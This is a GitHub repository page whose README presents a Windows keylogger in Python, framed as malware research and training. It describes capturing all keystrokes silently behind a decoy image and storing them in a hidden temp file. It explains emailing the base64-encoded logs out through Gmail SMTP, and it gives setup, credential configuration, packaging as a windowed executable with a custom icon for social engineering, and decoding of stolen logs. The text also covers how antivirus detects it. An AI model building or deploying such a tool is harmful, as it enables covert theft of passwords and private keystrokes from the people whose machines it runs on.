Skip to content

Dawn-Fighter/Keylogger

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

13 Commits
LICENSE
LICENSE
 
 
README.md
README.md
 
 
main.py
main.py
 
 
walpaper.jpg
walpaper.jpg
 
 

Repository files navigation

Keylogger — Windows Keystroke Capture & Exfiltration Demo

Python Platform License

A Python-based keylogger built to demonstrate how keystroke capture and data exfiltration work at a technical level. Written for malware research, security awareness training, and understanding attacker techniques in controlled lab environments.

⚠️ Authorized use only. Running this on any system without explicit written consent is illegal. This is a research and education tool — treat it accordingly.

What It Does

  • Captures all keystrokes using pynput
  • Stores logs in an obfuscated temp file with a randomized filename
  • Encodes logs in base64 and exfiltrates via Gmail SMTP on a randomized timer (200–450s)
  • Displays a decoy image on launch while running silently in the background
  • Can be compiled to a standalone .exe with PyInstaller for lab deployment testing

Technical Overview

Component Implementation
Keystroke capture pynput.keyboard.Listener
Log storage Randomized .dat file in %TEMP%
Encoding Base64 via base64 module
Exfiltration SMTP over Gmail with App Password auth
Persistence trigger Background thread, timer-based flush
Decoy PIL.Image display on launch

Setup

git clone https://github.com/Dawn-Fighter/Keylogger.git
cd Keylogger
pip install pynput pillow

Configure Email Exfiltration

Open keylogger.py and set your credentials in the tx() function:

s  = "sender@gmail.com"         # sending address
r  = "receiver@gmail.com"       # receiving address
pw = "xxxx xxxx xxxx xxxx"      # Gmail App Password (not your main password)

To get a Gmail App Password: Google Account → Security → 2-Step Verification → App Passwords.

Add Decoy Image

Place any image as walpaper.jpg in the same directory as main.py, or update the filename in the script.

Usage

# Run directly
python main.py

Decoy image flashes briefly, then the logger runs silently. Logs are flushed and emailed every 200–450 seconds. Kill via Task Manager or Ctrl+C.

Build as Executable (Lab Testing)

pip install pyinstaller
pyinstaller --onefile --windowed --add-data "walpaper.jpg;." keylogger.py

Output lands in dist/. Add --icon=youricon.ico to set a custom icon for social engineering simulations.

Decoding Captured Logs

Exfiltrated .dat attachments are base64-encoded. Decode with:

# Windows
certutil -decode yourfile.dat output.txt

# Linux / macOS
base64 -d yourfile.dat > output.txt

Detection

Modern AV and EDR solutions will flag this. Tested detections include:

  • Windows Defender — flags on pynput listener pattern
  • Process behavior monitoring — catches SMTP calls from non-browser processes
  • Network-level — SMTP traffic from endpoints without mail clients

This is intentional — part of the educational value is understanding why and how it gets caught.

Disclaimer

Built for malware analysis, blue team training, and understanding offensive techniques. Only deploy in isolated lab environments on systems you own or have written authorization to test. The author assumes no responsibility for misuse.

Author

Chethas Dileep — Penetration Tester & Security Developer

GitHub LinkedIn Portfolio

About

This repository contains a simple Python-based keylogger for Windows. It captures keystrokes, logs them to a hidden temporary file, and periodically emails the log using a Gmail account and app password.

Resources

Readme

License

MIT license
Activity

Stars

0 stars

Watchers

0 watching

Forks

0 forks
Report repository

Releases

No releases published

Packages

 
 
 

Contributors

Languages